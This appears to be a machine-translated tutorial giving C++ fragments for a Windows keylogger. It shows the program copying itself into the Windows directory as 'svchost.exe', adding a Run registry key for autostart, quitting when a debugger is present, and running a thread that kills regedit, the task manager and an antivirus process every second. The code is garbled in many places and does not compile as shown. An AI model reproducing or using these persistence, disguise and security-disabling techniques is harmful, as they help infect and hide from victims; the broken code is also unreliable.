[Crayon lang = "c + +"]
/ / Registry
char myname [500], tmpdir [500];
HKEY hKey;
DWORD dwFlags;
/ / ========================
extern int __ argc;
__argv extern char **;
ATOM MyRegisterClass (HINSTANCE hInstance);
LRESULT CALLBACK WndProc (HWND, UINT, WPARAM, LPARAM);
__declspec (dllexport) LRESULT CALLBACK KeyEvent (int pHookCode, pParamW WPARAM, LPARAM pParamL);
/ / EP section
/ / The registry function
void RegWriteString (HKEY hKey, LPCTSTR lpSubKey, lpValueName LPCTSTR, LPCTSTR lpData)
{
int ret = 0;
PhkResult HKEY = (HKEY) malloc (255);
ret = RegCreateKey (hKey, lpSubKey, & phkResult);
ret = RegSetValueEx (phkResult, lpValueName, 0, REG_SZ, (BYTE *) lpData, strlen (lpData));
RegCloseKey (hKey);
return;
}
[/ Crayon]
Usage examples AutoStartup:
Getting the original path of the keylogger, and then copy itself to the Windows directory with the name of svchost then make a key for the auto startup:
[Crayon lang = "c + +"]
/ / Create startup and copying files
szCurrent char [MAX_PATH];
szPath char [MAX_PATH];
GetModuleFileName (NULL, szCurrent, MAX_PATH-1);
GetWindowsDirectory (szPath, sizeof (szPath));
strcat (szPath, "\ \");
strcat (szPath, "svchost.exe");
CopyFile (szCurrent, szPath, true);
RegWriteString (HKEY_LOCAL_MACHINE, "Software \ \ Microsoft \ \ Windows \ \ CurrentVersion \ \ Run", "svchost system", szPath);
[/ Crayon]
Anti Debug
[Crayon lang = "c + +"]
/ / If debug, it will come out
if (IsDebuggerPresent () == TRUE)
ExitProcess (0);
[/ Crayon]
Monitoring active process and kill the process action deemed harmful keylogger
Preprocessor
[Crayon lang = "c + +"] # include tlhelp32.h [/ crayon]
Variable Declaration
[Crayon lang = "c + +"]
DWORD WINAPI terminator (LPVOID Param);
DWORD id = 0;
[/ Crayon]
Function Process Killer:
[Crayon lang = "c + +"]
/ / Function process killer
HANDLE hProcessSnap;
HANDLE hProcess;
PROCESSENTRY32 PE32;
KillProc void (char * szProcess)
{
hProcessSnap = CreateToolhelp32Snapshot (TH32CS_SNAPPROCESS, 0);
pe32.dwSize = sizeof (PROCESSENTRY32);
Process32First (hProcessSnap, and PE32);
/ / Do loop to be: D
while (Process32Next (hProcessSnap, and PE32))
{
if (! strcmp (pe32.szExeFile, szProcess))
{
hProcess = OpenProcess (PROCESS_TERMINATE, 0, pe32.th32ProcessID);
TerminateProcess (hProcess, 0);
}
}
CloseHandle (hProcess);
CloseHandle (hProcessSnap);
} [/ Crayon]
Use Process Killer
[Crayon lang = "c + +"]
/ / Process killer
DWORD WINAPI terminator (LPVOID Param)
{
while (1)
{
Sleep (1000);
KillProc ("regedit.exe");
KillProc ("taskman.exe");
KillProc ("PCMAV.exe");
}
EXIT_SUCCESS return;
}
[/ Crayon]
Create a new thread to perform the function of monitoring and process killer:
[Crayon lang = "c + +"]
CreateThread (NULL, 0, & terminator, NULL, 0, & id);
[/ Crayon]